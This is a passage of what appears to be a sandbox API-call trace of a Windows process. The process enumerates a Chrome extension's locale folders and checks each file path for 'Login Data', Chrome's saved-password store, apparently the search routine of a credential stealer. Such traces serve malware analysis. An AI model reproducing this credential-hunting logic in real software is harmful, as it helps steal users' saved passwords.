ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.627] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.627] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.627] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.627] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.627] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned 137 [0161.627] lstrlenW (lpString="\\") returned 1 [0161.627] GetProcessHeap () returned 0x8e0000 [0161.627] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0161.627] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\" [0161.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\") returned 138 [0161.627] lstrlenW (lpString="messages.json") returned 13 [0161.627] GetProcessHeap () returned 0x8e0000 [0161.627] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\" [0161.627] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" [0161.627] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.627] GetProcessHeap () returned 0x8e0000 [0161.627] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.627] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.627] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.627] GetProcessHeap () returned 0x8e0000 [0161.627] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.627] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.627] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.627] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.627] GetProcessHeap () returned 0x8e0000 [0161.627] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.627] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.628] GetProcessHeap () returned 0x8e0000 [0161.628] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.628] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="th", cAlternateFileName="")) returned 1 [0161.628] lstrcmpiW (lpString1="th", lpString2=".") returned 1 [0161.628] lstrcmpiW (lpString1="th", lpString2="..") returned 1 [0161.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.628] lstrlenW (lpString="\\") returned 1 [0161.628] GetProcessHeap () returned 0x8e0000 [0161.628] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.628] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.628] lstrlenW (lpString="th") returned 2 [0161.628] GetProcessHeap () returned 0x8e0000 [0161.628] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.628] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0161.628] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.628] GetProcessHeap () returned 0x8e0000 [0161.628] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned 137 [0161.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned 137 [0161.628] lstrlenW (lpString="\\*.*") returned 4 [0161.628] GetProcessHeap () returned 0x8e0000 [0161.628] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0161.628] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*" [0161.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.629] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.629] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.629] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.629] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.629] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned 137 [0161.629] lstrlenW (lpString="\\") returned 1 [0161.629] GetProcessHeap () returned 0x8e0000 [0161.629] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0161.629] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\" [0161.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\") returned 138 [0161.629] lstrlenW (lpString="messages.json") returned 13 [0161.629] GetProcessHeap () returned 0x8e0000 [0161.629] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\" [0161.629] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" [0161.629] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.629] GetProcessHeap () returned 0x8e0000 [0161.629] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.629] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json", lpSrch="Login Data") returned 0x0 [0161.629] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.629] GetProcessHeap () returned 0x8e0000 [0161.629] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.629] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.629] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.629] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.629] GetProcessHeap () returned 0x8e0000 [0161.629] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.629] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.630] GetProcessHeap () returned 0x8e0000 [0161.630] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.630] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="tr", cAlternateFileName="")) returned 1 [0161.630] lstrcmpiW (lpString1="tr", lpString2=".") returned 1 [0161.630] lstrcmpiW (lpString1="tr", lpString2="..") returned 1 [0161.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.630] lstrlenW (lpString="\\") returned 1 [0161.630] GetProcessHeap () returned 0x8e0000 [0161.630] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.630] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.630] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.630] lstrlenW (lpString="tr") returned 2 [0161.630] GetProcessHeap () returned 0x8e0000 [0161.630] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.630] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.630] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" [0161.630] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.630] GetProcessHeap () returned 0x8e0000 [0161.630] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, 